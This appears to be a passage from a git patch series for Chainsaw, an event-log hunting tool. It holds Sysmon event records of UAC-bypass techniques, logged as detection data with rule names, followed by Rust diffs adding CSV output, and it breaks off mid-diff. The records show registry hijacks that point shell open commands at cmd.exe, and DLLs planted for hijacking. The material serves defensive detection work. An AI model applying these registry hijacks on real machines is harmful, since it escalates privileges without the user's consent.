EventRecordID: 4726 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:41.757216Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"C:\\Windows \\System32\\winSAT.exe\" formal" - Company: Microsoft Corporation - CurrentDirectory: "C:\\Users\\IEUser\\Downloads\\" - Description: Windows System Assessment Tool - FileVersion: 10.0.17763.1 (WinBuild.160101.0800) - Hashes: "SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991" - Image: "C:\\Windows \\System32\\winSAT.exe" - IntegrityLevel: Medium - LogonGuid: 747F3D96-D21D-5D3C-0000-0020DD5C2300 - LogonId: "0x235cdd" - ParentCommandLine: "\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" " - ParentImage: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ParentProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ParentProcessId: 6632 - ProcessGuid: 747F3D96-D39D-5D3C-0000-0010131E5600 - ProcessId: 7128 - Product: Microsoft® Windows® Operating System - RuleName: PrivEsc - UACBypass Mocking Trusted WinFolders - TerminalSessionId: 1 - User: "MSEDGEWIN10\\IEUser" - UtcTime: "2019-07-27 22:43:41.972" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 1 - EventRecordID: 4727 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:42.033042Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CallTrace: "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fb4|C:\\Windows\\System32\\KERNELBASE.dll+47241|C:\\Windows\\System32\\KERNELBASE.dll+46196|C:\\Windows\\System32\\KERNEL32.DLL+1c2e3|C:\\Windows\\System32\\windows.storage.dll+19f330|C:\\Windows\\System32\\windows.storage.dll+14ce7e|C:\\Windows\\System32\\windows.storage.dll+efad8|C:\\Windows\\System32\\windows.storage.dll+ef8b7|C:\\Windows\\System32\\windows.storage.dll+ef51d|C:\\Windows\\System32\\windows.storage.dll+14b0ad|C:\\Windows\\System32\\windows.storage.dll+145da4|C:\\Windows\\System32\\windows.storage.dll+147c7a|C:\\Windows\\System32\\windows.storage.dll+14432d|C:\\Windows\\System32\\windows.storage.dll+144225|C:\\Windows\\System32\\SHELL32.dll+a880f|C:\\Windows\\System32\\SHELL32.dll+a86ca|C:\\Windows\\System32\\SHELL32.dll+484e7|C:\\Windows\\System32\\SHELL32.dll+52549|C:\\Windows\\System32\\SHELL32.dll+a8393|C:\\Windows\\System32\\SHELL32.dll+a826b|C:\\Windows\\System32\\SHELL32.dll+50666|C:\\Windows\\System32\\SHELL32.dll+c2e1e|C:\\Windows\\System32\\shcore.dll+2c315|C:\\Windows\\System32\\KERNEL32.DLL+17974" - GrantedAccess: "0x1fffff" - RuleName: "" - SourceImage: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - SourceProcessGUID: 747F3D96-D39D-5D3C-0000-001026F55500 - SourceProcessId: 6632 - SourceThreadId: 4364 - TargetImage: "C:\\Windows \\System32\\winSAT.exe" - TargetProcessGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 - TargetProcessId: 7128 - UtcTime: "2019-07-27 22:43:42.018" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 10 - EventRecordID: 4728 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 10 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:42.033420Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CommandLine: "\"C:\\Windows \\System32\\winSAT.exe\" formal" - Company: Microsoft Corporation - CurrentDirectory: "C:\\Windows\\system32\\" - Description: Windows System Assessment Tool - FileVersion: 10.0.17763.1 (WinBuild.160101.0800) - Hashes: "SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991" - Image: "C:\\Windows \\System32\\winSAT.exe" - IntegrityLevel: High - LogonGuid: 747F3D96-D21D-5D3C-0000-0020EE5B2300 - LogonId: "0x235bee" - ParentCommandLine: "\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" " - ParentImage: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ParentProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ParentProcessId: 6632 - ProcessGuid: 747F3D96-D39E-5D3C-0000-0010805A5600 - ProcessId: 3904 - Product: Microsoft® Windows® Operating System - RuleName: PrivEsc - UACBypass Mocking Trusted WinFolders - TerminalSessionId: 1 - User: "MSEDGEWIN10\\IEUser" - UtcTime: "2019-07-27 22:43:42.354" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 1 - EventRecordID: 4730 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:42.392880Z" - Version: 5 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Image: "C:\\Users\\IEUser\\Downloads\\UACBypass.exe" - ProcessGuid: 747F3D96-D39D-5D3C-0000-001026F55500 - ProcessId: 6632 - RuleName: "" - UtcTime: "2019-07-27 22:43:42.394" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 5 - EventRecordID: 4731 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3376 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 5 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:42.938088Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Company: "?" - Description: "?" - FileVersion: "?" - Hashes: "SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6" - Image: "C:\\Windows \\System32\\winSAT.exe" - ImageLoaded: "C:\\Windows \\System32\\WINMM.dll" - ProcessGuid: 747F3D96-D39E-5D3C-0000-0010805A5600 - ProcessId: 3904 - Product: "?" - RuleName: PrivEsc - UACBypass Mocking Trusted WinFolders - Signature: "" - SignatureStatus: Unavailable - Signed: "false" - UtcTime: "2019-07-27 22:43:42.661" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 7 - EventRecordID: 4732 - Execution_attributes: - ProcessID: 2748 - ThreadID: 3384 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 7 - TimeCreated_attributes: - SystemTime: "2019-07-27T22:43:43.016956Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "c:\\Windows\\System32\\cmd.exe" - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-095D-5EB4-0000-001082FF1700 - ProcessId: 7084 - RuleName: PrivEsc - T1088 - UACBypass - changepk UACME61 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Launcher.SystemSettings\\shell\\open\\command\\(Default)" - UtcTime: "2020-05-07 13:13:01.680" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 112814 - Execution_attributes: - ProcessID: 2888 - ThreadID: 3384 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-05-07T13:13:01.683498Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Company: "?" - Description: "?" - FileVersion: "?" - Hashes: "SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC" - Image: "C:\\Windows\\ehome\\Mcx2Prov.exe" - ImageLoaded: "C:\\Windows\\ehome\\CRYPTBASE.dll" - ProcessGuid: 365ABB72-9AE2-5CD6-0000-0010337C1700 - ProcessId: 2688 - Product: "?" - RuleName: Possible UAC Bypass - mcx2prov DLL - Signature: "" - SignatureStatus: Unavailable - Signed: "false" - UtcTime: "2019-05-11 09:50:26.873" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: IEWIN7 - Correlation: ~ - EventID: 7 - EventRecordID: 15882 - Execution_attributes: - ProcessID: 2000 - ThreadID: 1748 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 7 - TimeCreated_attributes: - SystemTime: "2019-05-11T09:50:27.030880Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK" - EventType: SetValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-BB89-5EBA-0000-001057413600 - ProcessId: 1036 - RuleName: PrivEsc - Rogue Windir - UAC bypass prep - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir" - UtcTime: "2020-05-12 15:06:49.118" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 143174 - Execution_attributes: - ProcessID: 2856 - ThreadID: 3608 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2020-05-12T15:06:49.183867Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Company: "?" - Description: "?" - FileVersion: "?" - Hashes: "SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC" - Image: "C:\\Windows\\System32\\sysprep\\sysprep.exe" - ImageLoaded: "C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll" - ProcessGuid: 365ABB72-FE39-5CD6-0000-001012701700 - ProcessId: 2572 - Product: "?" - RuleName: Possible UAC Bypass - mcx2prov DLL - Signature: "" - SignatureStatus: Unavailable - Signed: "false" - UtcTime: "2019-05-11 16:54:17.821" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: IEWIN7 - Correlation: ~ - EventID: 7 - EventRecordID: 15992 - Execution_attributes: - ProcessID: 2008 - ThreadID: 1992 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 7 - TimeCreated_attributes: - SystemTime: "2019-05-11T16:54:18.069438Z" - Version: 3 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-08-03 12:06:53.846" - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-78DD-5D45-0000-0010B8A50301 - ProcessId: 5080 - RuleName: PrivEsc - UAC Bypass UACME 23 - TargetFilename: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\dismcore.dll" - UtcTime: "2019-08-03 12:06:53.846" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 5429 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-08-03T12:06:53.933988Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-08-03 12:08:13.721" - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-792D-5D45-0000-00104F190601 - ProcessId: 5336 - RuleName: PrivEsc - UAC Bypass UACME 22 - TargetFilename: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\comctl32.dll" - UtcTime: "2019-08-03 12:08:13.721" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 5438 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-08-03T12:08:13.818381Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "\"C:\\Windows\\system32\\cmd.exe\"" - EventType: SetValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-5808-5D45-0000-00106CDC3E00 - ProcessId: 924 - RuleName: PrivEsc - UAC bypass UACME-34 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir" - UtcTime: "2019-08-03 09:46:48.692" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5132 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-03T09:46:48.726304Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - EventType: DeleteValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-5808-5D45-0000-00106CDC3E00 - ProcessId: 924 - RuleName: PrivEsc - UAC bypass UACME-34 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir" - UtcTime: "2019-08-03 09:46:49.347" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 12 - EventRecordID: 5135 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 12 - TimeCreated_attributes: - SystemTime: "2019-08-03T09:46:49.436856Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: (Empty) - EventType: SetValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-5E6A-5D45-0000-001076639D00 - ProcessId: 4440 - RuleName: PrivEsc - UAC bypass UACME-33 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" - UtcTime: "2019-08-03 10:14:02.848" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5272 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-03T10:14:02.929209Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "C:\\Windows\\system32\\cmd.exe" - EventType: SetValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-5E6A-5D45-0000-001076639D00 - ProcessId: 4440 - RuleName: PrivEsc - UAC bypass UACME-33 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command\\(Default)" - UtcTime: "2019-08-03 10:14:02.848" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5273 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-03T10:14:02.934826Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - EventType: DeleteKey - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-5E6A-5D45-0000-001076639D00 - ProcessId: 4440 - RuleName: PrivEsc - UAC bypass UACME-33 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\ms-settings\\shell\\open\\command" - UtcTime: "2019-08-03 10:14:08.503" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 12 - EventRecordID: 5278 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 12 - TimeCreated_attributes: - SystemTime: "2019-08-03T10:14:08.681363Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - CreationUtcTime: "2019-08-03 10:51:46.599" - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-6742-5D45-0000-00104A66B500 - ProcessId: 6380 - RuleName: PrivEsc - UAC Bypass UACME 32 - TargetFilename: "C:\\Users\\IEUser\\AppData\\Local\\Temp\\OskSupport.dll" - UtcTime: "2019-08-03 10:51:46.599" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 11 - EventRecordID: 5305 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 11 - TimeCreated_attributes: - SystemTime: "2019-08-03T10:51:46.647421Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "c:\\Windows\\SysWOW64\\notepad.exe" - EventType: SetValue - Image: "C:\\Windows\\explorer.exe" - ProcessGuid: 747F3D96-9DB0-5D46-0000-00108243AF03 - ProcessId: 3580 - RuleName: PrivEsc - UAC bypass UACME-45 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\exefile\\shell\\open\\command\\(Default)" - UtcTime: "2019-08-04 08:56:16.635" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5664 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T08:56:16.650581Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - ---- -Event: - EventData: - Details: "C:\\Windows\\system32\\cmd.exe" - EventType: SetValue - Image: "C:\\Windows\\system32\\reg.exe" - ProcessGuid: 747F3D96-A104-5D46-0000-001092A6BC03 - ProcessId: 2576 - RuleName: PrivEsc - UAC bypass UACME-53 - TargetObject: "HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Folder\\shell\\open\\command\\(Default)" - UtcTime: "2019-08-04 09:10:29.025" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: MSEDGEWIN10 - Correlation: ~ - EventID: 13 - EventRecordID: 5698 - Execution_attributes: - ProcessID: 2780 - ThreadID: 3676 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon - Security_attributes: - UserID: S-1-5-18 - Task: 13 - TimeCreated_attributes: - SystemTime: "2019-08-04T09:10:29.060588Z" - Version: 2 -Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - diff --git a/src/lib.rs b/src/lib.rs index 5ed06265..98bd7901 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -5,7 +5,7 @@ pub(crate) use anyhow::Result; pub use file::{evtx, get_files, Reader}; pub use hunt::{Detection, Hunter, HunterBuilder}; -pub use rule::{lint_rule, load_rule, Kind as RuleKind}; +pub use rule::{lint_rule, load_rule, sigma, Kind as RuleKind}; pub use search::{Searcher, SearcherBuilder}; pub use write::{set_writer, Format, Writer, WRITER}; diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 9e11134f..b243bcbb 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -3,7 +3,7 @@ use std::str::FromStr; use serde::Deserialize; -pub use chainsaw::Rule; +pub use self::chainsaw::Rule; pub mod chainsaw; pub mod sigma; diff --git a/tests/convert.rs b/tests/convert.rs index eec03b08..95423d1c 100644 --- a/tests/convert.rs +++ b/tests/convert.rs @@ -3,7 +3,7 @@ use std::path::Path; use regex::Regex; use serde_yaml::Value as Yaml; -use chainsaw::convert::sigma; +use chainsaw::sigma; mod common; From 70a854819e0120aecec79e67ad1ca1019c098610 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Fri, 3 Jun 2022 00:04:03 +0100 Subject: [PATCH 03/77] feat: add csv support back into chainsaw --- src/cli.rs | 116 +++++++++++++++++++++++++++++++++++++++++++++++- src/file/mod.rs | 43 ++++++++++++++++-- src/main.rs | 65 +++++++++++++++++---------- src/write.rs | 5 +++ 4 files changed, 200 insertions(+), 29 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 1315bd49..099e049e 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -1,4 +1,5 @@ use std::collections::HashMap; +use std::fs; use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; use chrono_tz::Tz; @@ -8,6 +9,7 @@ use tau_engine::Document; use crate::hunt::{Detection, Detections, Kind, Mapping}; use crate::rule::Rule; +use crate::write::WRITER; #[cfg(not(windows))] pub const RULE_PREFIX: &str = "‣"; @@ -100,7 +102,7 @@ pub fn print_detections( .collect(); let rules: HashMap<_, _> = rules.iter().map(|r| (&r.tag, r)).collect(); - // Do a signle unfold... + // Do a single unfold... let mut grouped: HashMap< (&Option, &String), Vec<(&NaiveDateTime, &Kind, Vec<&String>)>, @@ -216,6 +218,118 @@ pub fn print_detections( } } +pub fn print_csv( + detections: &[Detections], + mappings: &[Mapping], + local: bool, + timezone: Option, +) -> crate::Result<()> { + let directory = unsafe { + WRITER + .path + .as_ref() + .expect("could not get output directory") + }; + fs::create_dir_all(directory)?; + let mappings: HashMap<_, HashMap<_, _>> = mappings + .iter() + .map(|m| (&m.name, m.groups.iter().map(|g| (&g.name, g)).collect())) + .collect(); + // Do a single unfold... + let mut grouped: HashMap< + (&Option, &String), + Vec<(&NaiveDateTime, &Kind, Vec<&String>)>, + > = HashMap::new(); + for detection in detections { + let mut tags: HashMap<(&Option, &String), (&NaiveDateTime, Vec<&String>)> = + HashMap::new(); + for hit in &detection.hits { + let tags = tags + .entry((&hit.mapping, &hit.group)) + .or_insert((&hit.timestamp, vec![])); + (*tags).1.push(&hit.tag); + } + for (k, v) in tags { + let grouped = grouped.entry(k).or_insert(vec![]); + (*grouped).push((&v.0, &detection.kind, v.1)); + } + } + let mut keys = grouped.keys().cloned().collect::>(); + keys.sort(); + for key in keys { + let mut grouped = grouped.remove(&key).expect("could not get grouped!"); + grouped.sort_by(|x, y| x.0.cmp(&y.0)); + // FIXME: Handle name clashes + let filename = format!("{}.csv", key.1.replace(" ", "_").to_lowercase()); + let path = directory.join(&filename); + let mut csv = prettytable::csv::Writer::from_path(path)?; + cs_eprintln!("[+] Created {}", filename); + let (mapping, group) = key; + if let Some(mapping) = mapping { + if let Some(groups) = mappings.get(mapping) { + let group = groups.get(&group).expect("could not get group!"); + let mut header = vec!["timestamp", "detections"]; + if let Some(default) = group.default.as_ref() { + for field in default { + header.push(field); + } + } else { + header.push("data"); + } + csv.write_record(header)?; + for (timestamp, kind, mut tags) in grouped { + tags.sort(); + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + }; + let mut cells = vec![localised]; + cells.push( + tags.iter() + .map(|tag| format!("{}", tag.as_str())) + .collect::>() + .join(";"), + ); + let document = match kind { + Kind::Individual { document } => document, + _ => continue, + }; + if let Some(default) = group.default.as_ref() { + for field in default { + if let Some(value) = group + .fields + .get(field) + .and_then(|k| document.data.find(k)) + .and_then(|v| v.to_string()) + { + cells.push(value); + } else { + cells.push("".to_owned()); + } + } + } else { + let json = serde_json::to_string(&document.data) + .expect("could not serialise document"); + cells.push(json); + } + csv.write_record(cells)?; + } + } + } + } + Ok(()) +} + pub fn print_json( detections: &[Detections], rules: &[Rule], diff --git a/src/file/mod.rs b/src/file/mod.rs index e1562f13..21e35fac 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -105,14 +105,49 @@ impl Reader { } } -pub fn get_files(path: &PathBuf, extension: &Option) -> crate::Result> { +pub fn get_files( + path: &PathBuf, + extension: &Option, + skip_errors: bool, +) -> crate::Result> { let mut files: Vec = vec![]; if path.exists() { - let metadata = fs::metadata(&path)?; + let metadata = match fs::metadata(&path) { + Ok(metadata) => metadata, + Err(e) => { + if skip_errors { + cs_eyellowln!("failed to get metadata for file - {}", e); + return Ok(files); + } else { + anyhow::bail!(e); + } + 